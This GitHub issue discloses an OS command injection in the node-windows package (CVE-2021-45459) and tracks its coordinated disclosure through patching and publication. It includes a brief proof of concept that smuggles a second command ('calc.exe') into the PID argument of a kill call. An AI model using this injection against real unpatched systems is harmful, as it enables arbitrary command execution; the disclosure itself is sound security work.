Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

OS Command Injection in node-windows #4

Closed
dwisiswant0 opened this issue Aug 5, 2021 · 2 comments
Closed

OS Command Injection in node-windows #4

dwisiswant0 opened this issue Aug 5, 2021 · 2 comments
Assignees
Labels
disclosed Disclosure/advisory has been published & disclosed patched Patch version released poc Proof-of-concept dropped
Projects

Comments

@dwisiswant0
Copy link
Owner

dwisiswant0 commented Aug 5, 2021

Description

lib/cmd.js in the node-windows package before 1.0.0-beta.6 for Node.js allows command injection via the PID parameter.

CVE ID: CVE-2021-45459

Proof of Concept

// poc.js
var wincmd = require('node-windows');

wincmd.kill("12345; calc.exe", function(){
    console.log('Process Killed');
});

Impact

This issue may lead to arbitrary command execution.

References

@dwisiswant0 dwisiswant0 self-assigned this Aug 5, 2021
@dwisiswant0 dwisiswant0 added the needs triage Coordinated disclosure that need to be triaged label Aug 5, 2021
@dwisiswant0 dwisiswant0 added this to Needs triage in Advisory via automation Aug 5, 2021
@github-actions
Copy link

github-actions bot commented Dec 4, 2021

It seems like it's been 120-day, has this disclosure not received a response from the vendor yet? Please make a decision in the next 2-day.

@github-actions github-actions bot added deadline Disclosure deadline (120-day) reached & make a decision for disclosure and removed deadline Disclosure deadline (120-day) reached & make a decision for disclosure labels Dec 4, 2021
@dwisiswant0 dwisiswant0 added the patched Patch version released label Dec 7, 2021
@dwisiswant0 dwisiswant0 added deadline Disclosure deadline (120-day) reached & make a decision for disclosure TBD Advisory to be determined labels Dec 16, 2021
@dwisiswant0
Copy link
Owner Author

CVE requested.

@github-actions github-actions bot removed TBD Advisory to be determined deadline Disclosure deadline (120-day) reached & make a decision for disclosure labels Dec 17, 2021
@dwisiswant0 dwisiswant0 added disclosed Disclosure/advisory has been published & disclosed poc Proof-of-concept dropped and removed needs triage Coordinated disclosure that need to be triaged labels Dec 23, 2021
@dwisiswant0 dwisiswant0 changed the title OS Command Injection in huntr#5e232589-d78d-4cb8-9d0b-cb7c428ac059 OS Command Injection in node-windows Dec 23, 2021
@dwisiswant0 dwisiswant0 moved this from Needs triage to Disclosed in Advisory Dec 23, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
disclosed Disclosure/advisory has been published & disclosed patched Patch version released poc Proof-of-concept dropped
Projects
Advisory
Disclosed
Development

No branches or pull requests

1 participant